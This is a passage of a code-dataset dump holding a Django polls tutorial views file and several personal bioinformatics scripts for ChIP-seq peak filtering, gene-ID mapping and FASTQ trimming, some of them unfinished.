"text": "from django.shortcuts import get_object_or_404, render\n\n# Create your views here.\n\n#if using render we dont need to load HttpResponse\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\n#from django.template import loader\n#from django.http import Http404\nfrom django.views import generic\n\nfrom .models import Choice, Question\n\n\n'''\n\ndef index(request):\n\tlatest_question_list = Question.objects.order_by('-pub_date')[:5]\n\t#template used for the long way\n\t#template = loader.get_template('polls/index.html')\n\tcontext = {\n\t\t'latest_question_list': latest_question_list, \n\t}\n\treturn render(request, 'polls/index.html', context)\n\t#Long way below, shortcut above\n\t#return HttpResponse(template.render(context, request))\n\n\n#THIS IS THE LONG WAY\ndef detail(request, question_id):\n\ttry:\n\t\tquestion = Question.objects.get(pk=question_id)\n\texcept Question.DoesNowExist:\n\t\traise Http404(\"Question does not exist\")\n\treturn render(request, 'polls/detail.html',{'question':question})\n\t# Below the HttpResponse is used for the long response\n\t#return HttpResponse(\"You're looking at question %s.\" % question_id)\n\n\n#SHORT WAY FOR 404'S:\ndef detail(request, question_id):\n\tquestion = get_object_or_404(Question, pk=question_id)\n\treturn render(request, 'polls/detail.html', {'question':question})\n\ndef results(request, question_id):\n\tquestion = get_object_or_404(Question, pk=question_id)\n\treturn render(request, 'polls/results.html', {'question':question})\n\n'''\n\n#THE ABOVE IS THE HARD WAY - WE ARE NOW USING GENERIC TEMPLATES:\n\nclass IndexView(generic.ListView):\n template_name = 'polls/index.html'\n context_object_name = 'latest_question_list'\n\n def get_queryset(self):\n \"\"\"Return the last five published questions.\"\"\"\n return Question.objects.order_by('-pub_date')[:5]\n\n\nclass DetailView(generic.DetailView):\n model = Question\n template_name = 'polls/detail.html'\n\n\nclass ResultsView(generic.DetailView):\n model = Question\n template_name = 'polls/results.html'\n\n\ndef vote(request,question_id):\n\tquestion = get_object_or_404(Question, pk=question_id)\n\ttry:\n\t\tselected_choice = question.choice_set.get(pk=request.POST['choice'])\n\texcept (KeyError, Choice.DoesNotExist):\n\t\t#Redisplay the question voting form\n\t\treturn render(request, 'polls/detail.html', {\n\t\t\t'question':question,\n\t\t\t'error_message': \"You didn't select a choice.\"\n\t\t})\n\telse:\n\t\tselected_choice.votes += 1\n\t\tselected_choice.save()\n\t\t# Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button. BE CAREFUL TO INCLUDE THE COMMA IN ARGS\n\t\treturn HttpResponseRedirect(reverse('polls:results',args=(question.id,)))\n\t\t\n\n"
},
{
"alpha_fraction": 0.7857142686843872,
"alphanum_fraction": 0.7857142686843872,
"avg_line_length": 27,
"blob_id": "d645b2af2f55518cbdc8089e7f28bf057d7910d4",
"content_id": "64d764bbeac52c61282f6a4aa897b91d217c6cad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/README.md",
"repo_name": "drewUCL/DjangoPolls",
"src_encoding": "UTF-8",
"text": "#Django Tutorial: Polls App\n"
}
] | 3 |
zhuyezhang/mycode-Shen | https://github.com/zhuyezhang/mycode-Shen | 2d49d955b748758cb4a54363d363dfcd9e3b06cf | b6d8d1274c61d2cb75eab9d56269457dcd3cb7e7 | 94ecd8c4f065e0063ffeb9f9ce25ba34a38269cb | refs/heads/master | 2019-02-26T03:14:42.376023 | 2017-09-05T11:34:05 | 2017-09-05T11:34:05 | 100,691,733 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5009074211120605,
"alphanum_fraction": 0.549909234046936,
"avg_line_length": 24.090909957885742,
"blob_id": "03c5b7b763eb97403ec75c7237a86f57186ded6e",
"content_id": "198e6acd87b24e9168215ae379eb12e3dfe84005",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 551,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 22,
"path": "/batch_peak_filter_last",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 2 ];then\necho \"Need 2 parameters! <IP_sample> <peaklist>\"\nexit\nfi\n\nIP_sample=$1\npeakfile=$2\n\npaste ${IP_sample}.peaks.IP.rpkm.bdg ${IP_sample}.peaks.control.rpkm.bdg | awk -v OFS='\\t' '{\n if($8==\"0\") {\n ratio=10;dRPKM=$4\n } \n else {\n ratio=$4/$8;dRPKM=$4-$8\n }; \n if(ratio>2 && dRPKM>0.5 && $8<5) {print $1,$2,$3,ratio,dRPKM}\n}' > ${IP_sample}.ratio2.dRPKM0.5.filtered.uniq.peaks.bed\n\nwc -l ${peakfile}\nwc -l ${IP_sample}.ratio2.dRPKM0.5.filtered.uniq.peaks.bed"
},
{
"alpha_fraction": 0.5776965022087097,
"alphanum_fraction": 0.5923217535018921,
"avg_line_length": 30.22857093811035,
"blob_id": "82fbc0f475328dd84d7d541a5fb069e7fdc99b63",
"content_id": "38da61c22a4aa5b38222743a7b4c832258597ad1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1094,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 35,
"path": "/transcriptIDtoGeneSymbol",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport re\nimport sys\n\nif len(sys.argv)<5:\n print(\"Usage:transcriptIDtoGeneSymbol <refGene.gtf> <transcript_id.txt> <outfile> <transcript_id_col_num>\")\n exit(0)\n\ndicts={}\nwith open(sys.argv[1]) as infile:\n for line in infile.readlines():\n transcript_id=re.search(\"transcript_id \\\"(\\S+)\\\"\",line).group(1)\n genename=re.search(\"gene_name \\\"(\\S+)\\\"\",line).group(1)\n dicts[transcript_id]=genename\n\noutfile=open(sys.argv[3],'w')\nwith open(sys.argv[2]) as infile2:\n for i in infile2.readlines():\n i=i.strip()\n outline=i+'\\n'\n transcript_ids=i.split('\\t')[int(sys.argv[4])-1]\n i_f='\\t'.join(i.split('\\t')[0:int(sys.argv[4])])\n i_b='\\t'.join(i.split('\\t')[int(sys.argv[4]):])\n transcripts=transcript_ids.split(';')\n try:\n gene_names=';'.join([dicts[val] for val in transcripts if not val=='NONE'])\n outline=i_f+'\\t'+gene_names+'\\t'+i_b+'\\n'\n except:\n pass\n outfile.write(outline)\n\ninfile.close()\ninfile2.close()\noutfile.close()\n\n"
},
{
"alpha_fraction": 0.6278026700019836,
"alphanum_fraction": 0.6569506525993347,
"avg_line_length": 15.518518447875977,
"blob_id": "1c6f2be9cee9f8ea3d006ff9e8044898dc9be6ae",
"content_id": "c40eb5543be5a59abdcb094710f6934a1a7a69de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 27,
"path": "/trim",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\n\nif len(sys.argv) < 5:\n\tprint(\"Usage:trim <raw_data> <clean_data> <start> <end>\")\n\texit(0)\n\ninfile=sys.argv[1]\n\noutfile=sys.argv[2]\n\nstart=int(sys.argv[3])\n\nend=int(sys.argv[4])\n\nloc=1\n\noutput=open(outfile,'w')\nwith open(infile) as fi:\n\tfor line in fi.readlines():\n\t\tif loc%2==0:\n\t\t\tline1=line.strip()\n\t\t\toutput.write(''.join(line1[start:end])+'\\n')\n\t\telse:\n\t\t\toutput.write(line)\n\t\tloc+=1\n"
},
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.6566037535667419,
"avg_line_length": 15.625,
"blob_id": "69188a7149eca62bbaef358f25c4b6f750efa6dd",
"content_id": "762ae0b93c2f9d4ee005d9944bb769884a764dd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 16,
"path": "/cost_time",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n#read -p \"please input your command: \" command\n\nif [ $# -lt 1 ];then\necho \"Need 1 parameters! <bash_file>\"\nexit\nfi\n\nbegin_time2=$(date +%s)\n\nbash $1\n\nend_time2=$(date +%s)\ncost_time2=$((end_time2 - begin_time2))\necho \"$command cost $cost_time2 seconds\""
},
{
"alpha_fraction": 0.6216216087341309,
"alphanum_fraction": 0.6685364842414856,
"avg_line_length": 35.314815521240234,
"blob_id": "9dca023ab12db9988968d8bc200d056b7209da3a",
"content_id": "e34028e8e93f4970631e0ba633a366b088cee03c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1961,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 54,
"path": "/batch_peak_filter_single",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 3 ];then\necho \"Need 3 parameters! <control_sample> <IP_sample> <peaklist>\"\nexit\nfi\n\nEXTEND=200\n\ncontrol_sample=$1\nsamtools sort ${control_sample}.bam ${control_sample}.sorted\ncontrol_bam=$(echo \"${control_sample}.sorted\")\nbamToBed -i ${control_bam}.bam | extend_single ~/tools/ucsc_tools/mm9.chrom.sizes |sort -k1,1 -k2,2n > ${control_sample}.bed\n\ncontrol_mappable_read_count=$(samtools view -F 0x0004 ${control_bam}.bam | wc -l)\ncontrol_total_read_count=$(samtools view ${control_bam}.bam | wc -l)\n\necho \"${control_bam}.bam has ${control_mappable_read_count} mappable reads and ${control_total_read_count} total reads.\"\n\nIP_sample=$2\nsamtools sort ${IP_sample}.bam ${IP_sample}.sorted\nIP_bam=$(echo \"${IP_sample}.sorted\")\nIP_mappable_read_count=$(samtools view -F 0x0004 ${IP_bam}.bam | wc -l) \nIP_total_read_count=$(samtools view ${IP_bam}.bam | wc -l)\n\necho \"${IP_bam}.bam has ${IP_mappable_read_count} mappable reads and ${IP_total_read_count} total reads.\"\n\nbamToBed -i ${IP_bam}.bam | extend_single ~/tools/ucsc_tools/mm9.chrom.sizes |sort -k1,1 -k2,2n > ${IP_sample}.bed\n\npeakfile=$3\n\ncoverageBed -a ${IP_sample}.bed -b ${peakfile} | awk -v OFS='\\t' -v SIZE=$IP_mappable_read_count '{print $1,$2,$3,($6*1000000/SIZE)*1000/($3-$2)}' > ${IP_sample}.peaks.IP.rpkm.bdg\necho \"1\"\n#for file in E14input2i E14-input-S\n#do\n# controls=controls''$file','\n#done\n\ncoverageBed -a ${control_sample}.bed -b ${peakfile} | awk -v OFS='\\t' -v SIZE=$control_mappable_read_count '{print $1,$2,$3,($6*1000000/SIZE)*1000/($3-$2)}' > ${IP_sample}.peaks.control.rpkm.bdg\n\necho \"2\"\n\npaste ${IP_sample}.peaks.IP.rpkm.bdg ${IP_sample}.peaks.control.rpkm.bdg | awk -v OFS='\\t' '{\n\tif($8==\"0\") {\n\t\tratio=10;dRPKM=$4\n\t} \n\telse {\n\t\tratio=$4/$8;dRPKM=$4-$8\n\t}; \n\tif(ratio>2 && dRPKM>0.5 && $8<5) {print $1,$2,$3,ratio,dRPKM}\n}' > ${IP_sample}.ratio2.dRPKM0.5.filtered.uniq.peaks.bed\n\nwc -l ${peakfile}\nwc -l ${IP_sample}.ratio2.dRPKM0.5.filtered.uniq.peaks.bed\n"
},
{
"alpha_fraction": 0.638107419013977,
"alphanum_fraction": 0.6572890281677246,
"avg_line_length": 22,
"blob_id": "322e232b6e68f7c9aaad37abc684ad7a0aefcee8",
"content_id": "e68a8aeaad7c0d13d954335ae60ef4417db4d3ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 34,
"path": "/get_gene_from_expression",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\nimport os\n\nif len(sys.argv)<5:\n\tprint(\"Usage:get_gene_from_expression genelist expression_table outputfile unmapped_genelist\")\n\texit(0)\n\ndicts={}\ni=0\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\ti+=1\n\t\tline=line.strip()\n\t\tdicts[line]=1\nprint(\"There are \"+str(i)+\" genes.\")\nprint(str(len(dicts.keys()))+\" genes unique.\")\n\noutfile=open(sys.argv[3],'w')\noutfile2=open(sys.argv[4],'w')\n\nmapped_count=0\nfor i in dicts.keys():\n\toutline=os.popen(\"grep -i \\'\\\\b\"+i+\"\\\\b\\' \"+sys.argv[2]).read().strip()\n\t#print(\"grep \\'\\\\b\"+i+\"\\\\b\\' \"+sys.argv[2])\n\t#print(outline)\n\tif not outline=='':\n\t\toutfile.write(outline+'\\n')\n\t\tmapped_count+=1\n\telse:\n\t\toutfile2.write(i+\"\\n\")\n\nprint(\"find \"+str(mapped_count)+\" genes.\")\n"
},
{
"alpha_fraction": 0.6397515535354614,
"alphanum_fraction": 0.6552795171737671,
"avg_line_length": 22,
"blob_id": "44e7d29a8ea26231815b0e8b9eef93503cccd876",
"content_id": "8db20fcfc825303e799058faa0f800482787d697",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 644,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 28,
"path": "/get_heatmapr_cluster",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\n\nif len(sys.argv)<2:\n\tprint('Usage:get_heatmapr_cluster <peak_cluster>')\n\texit(0)\n\ndicts={}\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\tline=line.strip()\n\t\tline_split=line.split('\\t')\n\t\tif line.startswith('class'):\n\t\t\tpass\n\t\telse:\n\t\t\tif line_split[0] in dicts.keys():\n\t\t\t\tdicts[line_split[0]].append('\\t'.join(line_split[1:]))\n\t\t\telse:\n\t\t\t\tdicts[line_split[0]]=['\\t'.join(line_split[1:])]\ninfile.close()\n\nfor i in dicts.keys():\n\toutfile=sys.argv[1]+'_'+i\n\twith open(outfile,'w') as outfile:\n\t\tfor lines in dicts[i]:\n\t\t\toutfile.write(lines+'\\n')\n\toutfile.close()\n"
},
{
"alpha_fraction": 0.6108512878417969,
"alphanum_fraction": 0.6342375874519348,
"avg_line_length": 20.3799991607666,
"blob_id": "f989a7d7cf43bc38af827a0ffcec7ebb610799f7",
"content_id": "657457509a4c91b4ec2f3d2396df5564d0e02557",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1069,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 50,
"path": "/EnsemblToGeneSymbol",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport mygene\nimport sys\nimport threading\n\nif len(sys.argv)<3:\n\tprint('Usage:EnsemblToGeneSymbol <Ensembl id list> <gene symbol>')\n\texit(0)\n\n#out=mg.query('PERM1',fields=['go','name','uniprot'],species='human')\n\nmg=mygene.MyGeneInfo()\n\noutfile=open(sys.argv[2],'w')\nmyout=[]\n\ndef getsymbol(line):\n\toutline=line\n line=line.strip()\n line_split=line.split('\\t')\n try:\n \tout=mg.query(line_split[0],fields='symbol',species='human') \n \t\tout2=mg.query(line_split[1],fields='symbol',species='human')\n\t\toutline=line+'\\t'+out['hits'][0]['symbol']+'\\t'+out2['hits'][0]['symbol']+'\\n'\n except:\n pass\n myout.append(outline)\n\n\nwith open(sys.argv[1]) as infile:\n\tthreads=[]\n\ti=0\n\tfor line in infile.readlines():\t\n\t\tt=threading.Thread(target=getsymbol,args=(line,))\n\t\tthreads.append(t)\n\t\ti+=1\n\t\tif i==100000:\n\t\t\tfor t1 in threads:\n\t\t\t\tt1.setDaemon(True)\n\t\t\t\tt1.start()\n\t\t\tt1.join()\n\t\t\tthreads=[]\n\t\t\ti=0\n\nfor line in myout:\n\toutfile.write(line)\n\ninfile.close()\noutfile.close()\n"
},
{
"alpha_fraction": 0.6485280990600586,
"alphanum_fraction": 0.6610169410705566,
"avg_line_length": 21.420000076293945,
"blob_id": "8bd88e125e0f821c928cb7b6b9749c975b818f68",
"content_id": "ef8262084bd1a77baf0ba4b0364031832d984a91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1121,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 50,
"path": "/siteproBW_h",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport time\nimport sys\nimport re\nimport os\n\nif len(sys.argv)<3:\n\tprint(\"Usage:heatmapr_h <bedfilelist> <wigfilelist> <advanced_parameter>\")\n\nparameter=''\nif len(sys.argv)>3:\n\tparameter=' '.join(sys.argv[3:])\n\n\nbedfiles=[]\ntitles=[]\nwith open(sys.argv[1]) as bedfile:\n\tfor i in bedfile.readlines():\n\t\ti=i.strip()\n\t\tif re.findall('\\t',i):\n\t\t\tbedfiles.append(i.split('\\t')[0])\n\t\t\ttitles.append(i.split('\\t')[1])\n\t\telse:\n\t\t\tbedfiles.append(i)\n\t\t\ttitles.append(i)\nbedfile.close()\n\nwigfiles=[]\nsubtitles=[]\nwith open(sys.argv[2]) as wigfile:\n\tfor i in wigfile.readlines():\n\t\ti=i.strip()\n\t\tif re.findall('\\t',i):\n\t\t\twigfiles.append(i.split('\\t')[0])\n\t\t\tsubtitles.append(i.split('\\t')[1])\n\t\telse:\n\t\t\twigfiles.append(i)\n\t\t\tsubtitles.append(i)\nwigfile.close()\n\nbedfiles_str=' -b '.join(bedfiles)\nsubtitles_str=' -l '.join(titles)\n\nfor i in range(len(wigfiles)):\n\ttry:\n\t\tsystem_str='siteproBW -l '+subtitles_str+' --name='+wigfiles[i]+' -w '+wigfiles[i]+' -b '+bedfiles_str+' --span 3000 '+parameter+' &'\n\t\tos.system(system_str)\n\texcept:\n\t\tprint('Error during heatmapr.Skip this one.')\n"
},
{
"alpha_fraction": 0.6863836050033569,
"alphanum_fraction": 0.7017569541931152,
"avg_line_length": 32.485294342041016,
"blob_id": "ea59dedfaa21a0b63750d463880144cd98229016",
"content_id": "25f89d9579e87298c461957632580d80fcb2e1d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6830,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 204,
"path": "/!filter_peak",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport re\nimport sys\nimport math\n\ndef read_peaks(peaks_filename):\n\tprint(\"reading peaks file...\")\n\tpeak_dicts={}\n\twith open(peaks_filename) as peaks_in:\n\t\tfor line in peaks_in.readlines():\n\t\t\tchrom=line.split('\\t')[0]\n\t\t\tstart=int(line.split('\\t')[1])\n\t\t\tend=int(line.split('\\t')[2])\n\t\t\tif chrom in peak_dicts.keys():\n\t\t\t\tpeak_dicts[chrom].append((start,end))\n\t\t\telse:\n\t\t\t\tpeak_dicts[chrom]=[]\n\tpeaks_in.close()\n\treturn peak_dicts\n\ndef read_wig(wiggle_filename):\n\tprint(\"reading wiggle file...\")\n\twig_dicts={}\n\twith open(wiggle_filename) as wig_in:\n\t\ttemp_chrom=''\n\t\tfor line in wig_in.readlines():\n\t\t\tif line.startswith(\"track\"):\n\t\t\t\tpass\n\t\t\tif re.findall(\"chrom\",line):\n\t\t\t\tchrom=re.search(\"chrom\\=(\\S+)\",line).group(1)\n\t\t\t\ttemp_chrom=chrom\n\t\t\t\twig_dicts[chrom]={}\n\t\t\telse:\n\t\t\t\tline=line.strip()\n\t\t\t\tposition=int(line.split('\\t')[0])\n\t\t\t\tscore=float(line.split('\\t')[1])\n\t\t\t\twig_dicts[temp_chrom][position]=score\n\twig_in.close()\n\treturn wig_dicts\n\ndef read_bdg(bdg_filename):\n\tprint(\"reading bedgraph file...\")\n\twig_dicts={}\n\twith open(bdg_filename) as wig_in:\n\t\tfor line in wig_in.readlines():\n\t\t\tline=line.strip()\n\t\t\tchrom=line.split('\\t')[0]\n\t\t\tif not chrom in wig_dicts.keys():\n\t\t\t\twig_dicts[chrom]={}\n\t\t\tposition=int(int(line.split('\\t')[1])+int(line.split('\\t')[2])*0.5)\n\t\t\tscore=float(line.split('\\t')[-1])\n\t\t\t#print(chrom,position,score)\n\t\t\twig_dicts[chrom][position]=score\n\twig_in.close()\n\treturn wig_dicts\n\ndef output_peak(survive_peak_dicts,outfilename):\n\tchrom_list=sorted(survive_peak_dicts.keys())\n\toutfile=open(outfilename,'w')\n\tloc=0\n\tfor chrom in chrom_list:\n\t\tout_list=survive_peak_dicts[chrom]\n\t\tfor (peak_start,peak_end) in out_list:\n\t\t\toutfile.write(chrom+'\\t'+str(peak_start)+'\\t'+str(peak_end)+'\\tpeak_'+str(loc)+'\\n')\n\t\t\tloc+=1\n\toutfile.close()\n\ndef remove_FP_all(peak_dicts,wig_dicts,wig_dicts_treat,outfilename):\n\toutfile_dicts={}\n\tfor chrom in peak_dicts.keys():\n\t\tpeak_list_for_chrom=remove_FP_chrom(peak_dicts[chrom],wig_dicts[chrom],wig_dicts_treat[chrom],chrom)\n\t\toutfile_dicts[chrom]=peak_list_for_chrom\n\toutput_peak(outfile_dicts,outfilename)\n\ndef remove_FP_chrom(peak_list,wig_dicts_dicts,wig_dicts_dicts_treat,chrom):\n\tpeak_list_out=[]\n\twig_postion=sorted(wig_dicts_dicts.keys())\n\twig_dicts_list=sorted(wig_dicts_dicts.items(),key=lambda item:item[0])\n\tposition_dicts=mk_index(wig_postion)\n\n\twig_postion_treat=sorted(wig_dicts_dicts_treat.keys())\n\twig_dicts_list_treat=sorted(wig_dicts_dicts_treat.items(),key=lambda item:item[0])\n\tposition_dicts_treat=mk_index(wig_postion_treat)\n\n\tfor (peak_start,peak_end) in peak_list:\n\t\ttry:\n\t\t\tpositions_core=find_position(peak_start,peak_end,position_dicts)\n\t\t\tpositions_treat_core=find_position(peak_start,peak_end,position_dicts_treat)\n\t\t\tscores_core={}\n\t\t\tscores_treat_core={}\n\t\t\tfor loc in positions_core:\n\t\t\t\tscores_core[loc]=wig_dicts_dicts[loc]\n\t\t\tfor loc in positions_treat_core:\n\t\t\t\tscores_treat_core[loc]=(wig_dicts_dicts_treat[loc]\n\t\t\tsubmit=int((peak_start+peak_end)*0.5)\n\t\t\tpeak_start_2=submit-3000 if submit>3000 else 
1\n\t\t\tpeak_end_2=submit+3000\n\t\t\tpostions_all=find_position(peak_start_2,peak_end_2,position_dicts)\n\t\t\tpositions_treat_all=find_position(peak_start_2,peak_end_2,position_dicts_treat)\n\t\t\tscores_all={}\n\t\t\tscores_treat_all={}\n\t\t\tfor loc in positions_all:\n\t\t\t\tscores_all[loc]=wig_dicts_dicts[loc]\n\t\t\tfor loc in positions_treat_all:\n\t\t\t\tscores_treat_all[loc]=wig_dicts_dicts_treat[loc]\n\t\t\tpositons_except=[for i in positions_all if not in positions_core]\n\t\t\t\n\t\t\t#print(scores_treat)\n\t\t\t#rate,mianji,minus_control=compare(positions,scores)\n\t\t\t#rate_treat,mianji_treat,minus_treat=compare(positions,scores)\n\t\t\t#if rate_treat<=0.85 and mianji_treat>2*mianji:\n\t\t\t#\tpeak_list_out.append((peak_start,peak_end))\n\t\t\t#else:\n\t\t\t#\tpass\n\t\texcept:\n\t\t\tprint(\"Can not find...\")\n\t\t\tprint(chrom,peak_start,peak_end)\n\treturn peak_list_out\n\ndef compare(position_list,score_list):\n\tmianji=0\n\tfor i in range(len(position_list)-1):\n\t\tmianji=mianji+float((position_list[i+1]-position_list[i])*(score_list[i]+score_list[i+1])*0.5)\n\tmax_mian=float(position_list[-1]-position_list[0])*max(score_list)\n\tmin_mian=float(position_list[-1]-position_list[0])*min(score_list)\n\trate=float(mianji)/max_mian\n\tmianji_minus=max_mian-min_mian\n\treturn rate,mianji,mianji_minus\n\ndef mk_index(wig_postion):\n\tposition_dicts={}\n\tnumber=int(math.sqrt(len(wig_postion)))\n\tfor i in range(0,len(wig_postion),number):\n\t\tposition_dicts[wig_postion[i]]=wig_postion[i:i+number]\n\treturn position_dicts\n\ndef find_position(peak_start,peak_end,position_dicts):\n\tindex_list=sorted(position_dicts.keys())\n\tstart_index=0\n\tstart_index_f=0\n\tend_index=0\n\tend_index_f=0\n\tfor i in range(len(index_list)-1):\n\t\tif index_list[i]<=peak_start and index_list[i+1]>peak_start:\n\t\t\tstart_index=index_list[i]\n\t\t\tstart_index_f=index_list[i+1]\n\t\t\tbreak\n\t\telse:\n\t\t\tstart_index=index_list[-1]\n\t\t\tstart_index_f=index_list[-1]\n\tfor i in range(len(index_list)-1):\n\t\tif index_list[i]<=peak_end and index_list[i+1]>peak_end:\n\t\t\tend_index=index_list[i]\n\t\t\tend_index_f=index_list[i+1]\n\t\t\tbreak\n\t\telse:\n\t\t\tend_index=index_list[-1]\n\t\t\tend_index_f=index_list[-1]\n\tif start_index == end_index:\n\t\tstart_list=search_index(start_index,peak_start,position_dicts,1,1)\n\t\tend_list=search_index(end_index,peak_end,position_dicts,0,0)\n\t\tpostion_list = [val for val in start_list if val in end_list]\n\telse:\n\t\tif peak_start-start_index <= start_index_f-peak_start:\n\t\t\tstart_list=search_index(start_index,peak_start,position_dicts,1,1)\n\t\telse:\n\t\t\tstart_list=search_index(start_index,peak_start,position_dicts,1,0)\n\t\tif peak_end-end_index <= end_index_f-peak_end:\n\t\t\tend_list=search_index(end_index,peak_end,position_dicts,0,1)\n\t\telse:\n\t\t\tend_list=search_index(end_index,peak_end,position_dicts,0,0)\n\t\tpostion_list=start_list.extend(end_list)\n\treturn postion_list\n\ndef search_index(wig_position_index,peak_positon,wig_position_dicts,flag_start_end,flag_zf):\n\tsearch_field=wig_position_dicts[wig_position_index]\n\tif flag_zf==1:\n\t\tfor i in range(len(search_field)-1):\n\t\t\tif search_field[i] <= peak_positon and search_field[i+1] > peak_positon:\n\t\t\t\tif flag_start_end==1:\n\t\t\t\t\treturn search_field[i:]\n\t\t\t\telse:\n\t\t\t\t\treturn search_field[:i+1]\n\tif flag_zf==0:\n\t\tfor i in range(len(search_field)-1,0,-1):\n\t\t\tif search_field[i] >= peak_positon and search_field[i-1] < 
peak_positon:\n\t\t\t\tif flag_start_end==1:\n\t\t\t\t\treturn search_field[i-1:]\n\t\t\t\telse:\n\t\t\t\t\treturn search_field[:i]\n\ndef main(file1,file2,file3,file4):\n\tpeak_dicts=read_peaks(file1)\n\twig_dicts_dicts_control=read_bdg(file2)\n\twig_dicts_dicts_treat=read_bdg(file3)\n\tremove_FP_all(peak_dicts,wig_dicts_dicts_control,wig_dicts_dicts_treat,file4)\n\nif __name__ == '__main__':\n\tif len(sys.argv)<5:\n\t\tprint(\"Usage:filter_peak peak.bed control.wig treat.wig outfile\")\n\t\texit(0)\n\telse:\n\t\tmain(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])"
},
{
"alpha_fraction": 0.5280373692512512,
"alphanum_fraction": 0.5467289686203003,
"avg_line_length": 28.18181800842285,
"blob_id": "a634313707a662fdd1d69cd5bcbfce18f751d7f1",
"content_id": "108c3ec1b5bf31ae4d0dc58c58660f141a73fb11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 642,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 22,
"path": "/cat_peaks_macs2",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\n\nif len(sys.argv)<3:\n print(\"Usage:cat_peaks_bed_macs2 <peaks.xls> <outfile>\")\n exit(0)\n\noutfile=open(sys.argv[2],'w')\nwith open(sys.argv[1]) as peak_xls:\n for line in peak_xls.readlines():\n if line.startswith(\"#\") or line=='\\n':\n pass\n else:\n line=line.strip()\n line_split=line.split('\\t')\n if line_split[0] == 'chr':\n pass\n else:\n outfile.write(line_split[0]+'\\t'+line_split[1]+'\\t'+line_split[2]+'\\t'+line_split[-1]+'\\t'+line_split[8]+'\\n')\npeak_xls.close()\noutfile.close()\n"
},
{
"alpha_fraction": 0.6324999928474426,
"alphanum_fraction": 0.6575000286102295,
"avg_line_length": 21.27777862548828,
"blob_id": "500a900e9604cfcaacd2d62f7e386892e2cb82f3",
"content_id": "b12ec3f827eea7b665e5f76f55d0260ccb83db6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 400,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 18,
"path": "/merge_bed",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\ni=1\nlist=[]\nfor line in sys.stdin.readlines():\n\tline=line.strip()\n\tline_split=line.split('\\t')\n\tif i%2==0:\n\t\tlist.append(int(line_split[1]))\n\t\tlist.append(int(line_split[2]))\n\t\tchrom=line_split[0]\n\t\tprint(chrom+'\\t'+str(min(list))+'\\t'+str(max(list)))\n\t\tlist=[]\t\n\telse:\n\t\tlist.append(int(line_split[1]))\n\t\tlist.append(int(line_split[2]))\n\ti+=1"
},
{
"alpha_fraction": 0.6522449254989624,
"alphanum_fraction": 0.6620408296585083,
"avg_line_length": 23.019607543945312,
"blob_id": "3a76c015e5d31094499e7da0ce384cac620b1871",
"content_id": "da947f82675089a0d84209181281125364b57146",
